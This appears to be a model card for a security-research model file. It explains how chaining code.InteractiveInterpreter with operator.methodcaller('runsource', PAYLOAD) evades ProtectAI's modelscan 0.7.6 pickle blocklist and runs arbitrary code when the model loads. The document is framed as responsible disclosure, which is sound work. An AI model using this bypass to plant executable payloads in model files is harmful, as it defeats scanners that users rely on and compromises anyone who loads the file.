| license: mit | |
| tags: | |
| - security-research | |
| - modelscan-bypass | |
| # Modelscan Bypass: code.InteractiveInterpreter + operator.methodcaller | |
| ## Summary | |
| This model file bypasses ProtectAI modelscan 0.7.6 (latest) scanner while achieving arbitrary code execution via Python's `code.InteractiveInterpreter` module combined with `operator.methodcaller`. | |
| ## Bypass Chain | |
| 1. `code.InteractiveInterpreter()` — creates a Python interactive interpreter instance | |
| 2. `operator.methodcaller("runsource", PAYLOAD)` — creates a callable that invokes `.runsource()` with arbitrary Python code | |
| 3. Chain executes: `interp.runsource(payload)` → arbitrary code execution | |
| ## Why It Works | |
| - `code` module is NOT in modelscan's `unsafe_globals` blocklist | |
| - `operator.methodcaller` is NOT blocked (only `operator.attrgetter` is blocked) | |
| - `InteractiveInterpreter.runsource()` calls `compile()` then `exec()` internally | |
| - modelscan only checks module+function pairs against its blocklist | |
| ## Modelscan Result | |
| ## Impact | |
| Full arbitrary code execution on model load via `pickle.load()` or `torch.load()`. | |
| ## Affected | |
| modelscan 0.7.6 (latest on PyPI as of 2026-04-10) | |
| ## Responsible Disclosure | |
| Submitted to Huntr for ProtectAI review. | |